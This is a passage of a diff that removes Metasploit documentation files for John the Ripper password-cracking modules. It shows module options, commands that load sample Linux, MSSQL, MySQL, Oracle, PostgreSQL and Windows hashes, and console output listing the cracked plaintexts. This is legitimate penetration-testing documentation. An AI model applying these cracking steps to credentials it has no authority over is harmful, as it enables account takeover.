-creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
-creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_linux 
-msf5 auxiliary(analyze/jtr_linux) > set crypt true
-crypt => true
-msf5 auxiliary(analyze/jtr_linux) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
-[*] Cracking md5crypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] md5_password:password
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[*] Cracking bsdicrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] bsdi_password:password
-[*] Cracking crypt hashes in normal wordlist mode...
-Warning: hash encoding string length 20, type id #4
-appears to be unsupported on this system; will not load such hashes.
-Warning: hash encoding string length 60, type id $2
-appears to be unsupported on this system; will not load such hashes.
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] md5_password:password
-[+] sha256_password:password
-[+] sha512_password:password
-[*] Cracking bcrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] blowfish_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_linux) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                             realm  private_type        JtR Format
-----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
-                       bsdi_password      password                                                                                                   Password            
-                       des_password       password                                                                                                   Password            
-                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
-                       md5_password       password                                                                                                   Password            
-                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
-                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
-                       sha512_password    password                                                                                                   Password            
-                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
-                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
-                       sha256_password    password                                                                                                   Password            
-                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
-                       blowfish_password  password                                                                                                   Password            
-
-```

documentation/modules/auxiliary/analyze/jtr_mssql_fast.md

@@ -1,157 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
-  SQL based password hashes, such as:
-
-  * `mssql` based passwords
-  * `mssql05` based passwords
-  * `mssql12` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
-creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
-creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mssql_fast 
-msf5 auxiliary(analyze/jtr_mssql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
-[*] Cracking mssql05 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[*] Cracking mssql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql_foo:FOO
-[+] mssql_foo:FOO
-[*] Cracking mssql12 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql12_Password1!:Password1!
-[+] mssql12_Password1!:Password1!
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mssql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
-----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
-                       mssql05_toto        toto                                                                                                                                                   Password            
-                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
-                       mssql_foo           FOO                                                                                                                                                    Password            
-                       mssql_foo           foo                                                                                                                                                    Password            
-                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
-                       mssql12_Password1!  Password1!                                                                                                                                             Password            
-                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
-
-```

documentation/modules/auxiliary/analyze/jtr_mysql_fast.md

@@ -1,139 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
-  based password hashes, such as:
-
-  * `mysql` (pre 4.1) based passwords
-  * `mysql-sha1` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
-creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mysql_fast 
-msf5 auxiliary(analyze/jtr_mysql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
-[*] Cracking mysql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql_probe:probe
-[*] Cracking mysql-sha1 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql-sha1_tere:tere
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mysql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public           private                                    realm  private_type        JtR Format
-----  ------  -------  ------           -------                                    -----  ------------        ----------
-                       mysql_probe      probe                                             Password            
-                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
-                       mysql-sha1_tere  tere                                              Password            
-                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
-
-```

documentation/modules/auxiliary/analyze/jtr_oracle_fast.md

@@ -1,168 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
-  based password hashes, such as:
-
-  * `oracle` (<=10) aka `des` based passwords
-  * `oracle11` based passwords
-  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
-  * `oracle12c` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  For a detailed explanation of Oracle 11/12c formats, see
-  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
-
-  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
-  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
-
-## Verification Steps
-
-  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
-creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
-creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_oracle_fast 
-msf5 auxiliary(analyze/jtr_oracle_fast) > run
-
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
-[*] Cracking oracle hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] simon:A
-[+] SYSTEM:THALES
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
-[*] Cracking dynamic_1506 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1506 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
-[*] Cracking oracle11 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle11 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] DEMO:epsilon
-[+] oracle11_epsilon:epsilon
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
-[*] Cracking oracle12c hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle12c hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] oracle12c_epsilon:epsilon
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_oracle_fast) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
-----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
-                       simon              A                                                                                                                                                                                                                                                                            Password            
-                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
-                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
-                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
-
-```

documentation/modules/auxiliary/analyze/jtr_postgres_fast.md

@@ -1,131 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
-  based password hashes, such as:
-
-  * `postgres` based passwords
-  * `raw-md5` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
-  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
-
-## Verification Steps
-
-  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_postgres_fast 
-msf5 auxiliary(analyze/jtr_postgres_fast) > run
-
-[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
-[*] Cracking dynamic_1034 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] example:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_postgres_fast) > creds
-Credentials
-===========
-
-host  origin  service  public   private                              realm  private_type  JtR Format
-----  ------  -------  ------   -------                              -----  ------------  ----------
-                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
-                       example  password                                    Password      
-
-```

documentation/modules/auxiliary/analyze/jtr_windows_fast.md

@@ -1,158 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
-  based password hashes, such as:
-
-  * `LM`, or `LANMAN` based passwords
-  * `NT`, `NTLM`, or `NTLANMAN` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `nt` or `lm` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
-creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_windows_fast 
-msf5 auxiliary(analyze/jtr_windows_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
-[*] Cracking lm hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
-Session completed
-[*] Cracking lm hashes in single mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
-Session completed
-[*] Cracking lm hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
-Session completed
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[*] Cracking nt hashes in normal wordlist mode...
